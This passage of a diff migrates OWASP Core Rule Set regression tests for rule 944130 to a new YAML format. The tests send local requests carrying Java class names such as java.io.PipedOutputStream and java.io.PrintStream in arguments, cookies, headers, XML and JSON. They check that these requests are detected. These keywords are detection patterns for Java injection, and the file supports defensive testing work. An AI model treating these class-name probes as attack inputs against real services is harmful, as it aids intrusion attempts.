"application/x-www-form-urlencoded" - Cookie: java.io.PipedOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-203 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 203 desc: "Request header test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-204 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 204 desc: "XML attribute value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-205 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 205 desc: "XML element value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-206 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 206 desc: "Nested XML element value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-207 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 207 desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-208 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 208 desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-209 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 209 desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PipedOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-210 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PipedOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 210 desc: "Argument test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-211 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 211 desc: "Argument name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-212 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader=test" + output: + log: + expect_ids: [944130] + - test_id: 212 desc: "Cookie test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-213 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 213 desc: "Cookie name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-214 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 214 desc: "Request header test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-215 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 215 desc: "XML attribute value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-216 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 216 desc: "XML element value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-217 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 217 desc: "Nested XML element value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-218 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 218 desc: "Content-Type text/plain includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-219 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 219 desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-220 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 220 desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PipedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-221 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PipedReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 221 desc: "Argument test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-222 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 222 desc: "Argument name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-223 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream=test" + output: + log: + expect_ids: [944130] + - test_id: 223 desc: "Cookie test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PrintStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-224 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PrintStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 224 desc: "Cookie name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PrintStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-225 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PrintStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 225 desc: "Request header test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PrintStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-226 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PrintStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 226 desc: "XML attribute value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-227 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 227 desc: "XML element value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-228 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 228 desc: "Nested XML element value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-229 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 229 desc: "Content-Type text/plain includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-230 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 230 desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 